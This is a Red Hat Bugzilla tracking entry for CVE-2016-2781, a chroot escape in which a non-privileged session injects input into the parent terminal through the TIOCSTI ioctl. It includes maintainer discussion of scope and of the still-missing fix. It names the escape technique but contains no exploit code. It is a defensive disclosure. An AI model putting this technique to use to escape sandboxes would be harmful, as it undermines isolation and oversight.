Bug 1312863 - (CVE-2016-2781) CVE-2016-2781 coreutils: Non-privileged session can escape to the parent session in chroot
CVE-2016-2781 coreutils: Non-privileged session can escape to the parent sess...
Status: NEW
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
medium Severity medium
: ---
: ---
Assigned To: Red Hat Product Security
impact=moderate,public=20160228,repor...
: Security
Depends On: 1312864
Blocks: 1312867
  Show dependency treegraph
 
Reported: 2016-02-29 07:10 EST by Adam Mariš
Modified: 2017-08-30 10:18 EDT (History)
8 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed:
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Adam Mariš 2016-02-29 07:10:09 EST
It was found that When executing a program via "chroot --userspec=someuser:somegroup / /path/to/test" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer.

CVE assignment:

http://seclists.org/oss-sec/2016/q1/452
Comment 1 Adam Mariš 2016-02-29 07:11:07 EST
Created util-linux tracking bugs for this issue:

Affects: fedora-all [bug 1312864]
Comment 4 Ondrej Vasik 2016-04-04 08:48:39 EDT
Is that really against coreutils? Based on http://marc.info/?l=util-linux-ng&m=145694736107128&w=2 (and https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=815922 ) it seems to be issue with runuser/su - therefore util-linux was IMHO correct.
Comment 5 Cedric Buissart 2016-04-05 11:35:33 EDT
(In reply to Ondrej Vasik from comment #4)
> Is that really against coreutils? Based on
> http://marc.info/?l=util-linux-ng&m=145694736107128&w=2 (and
> https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=815922 ) it seems to be
> issue with runuser/su - therefore util-linux was IMHO correct.

This BZ is for chroot jailbreak. 
the similar util-linux attack has its own BZ & CVE : CVE-2016-2779
Comment 6 Cedric Buissart 2016-04-08 06:16:36 EDT
Marking Not-a-bug for RHEL5 based on the following : 
RHEL5's chroot command does not have a drop-privilege feature (i.e. : --userspec). chroot will run command as a root, and it is expected from root to be able to break out of the jail (see https://securityblog.redhat.com/2013/03/27/is-chroot-a-security-feature/ or https://en.wikipedia.org/wiki/Chroot#Limitations for additional information)
Comment 7 Kamil Dudka 2016-09-27 07:48:56 EDT
I am not aware of any fix for chroot without unintended side-effect.  The situation is fairly well described in util-linux-2.28 release notes:

    This security issue is NOT FIXED yet.  It is possible to disable the ioctl
    TIOCSTI by setsid() only.  Unfortunately, setsid() has well-defined use
    cases in su(1) and runuser(1) and any changes would introduce regressions.
    It seems we need a better way -- ideally another ioctl (or whatever is
    supported by the kernel) to disable TIOCSTI without setsid().

https://www.kernel.org/pub/linux/utils/util-linux/v2.28/v2.28-ReleaseNotes

I am afraid the above statement applies to chroot, too.
Comment 8 Cedric Buissart 2016-09-27 08:50:21 EDT
Yes it does, and to polkit as well (CVE-2016-2568).
This idea of the new ioctl was originally suggested in the thread http://www.spinics.net/lists/util-linux-ng/msg12451.html. 
There has been afaik no kernel side discussion, though.
Comment 13 Kamil Dudka 2017-08-29 11:10:34 EDT
coreutils upstream has applied a similar patch (using libseccomp) on runcon:

http://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=v8.27-97-g8cb06d4
Comment 14 Kamil Dudka 2017-08-30 10:18:44 EDT
(In reply to Kamil Dudka from comment #13)
> coreutils upstream has applied a similar patch (using libseccomp) on runcon:
> 
> http://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=v8.27-97-g8cb06d4

coreutils upstream has reverted the above patch:

http://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=v8.27-101-gf5d7c0842

Note You need to log in before you can comment on or make changes to this bug.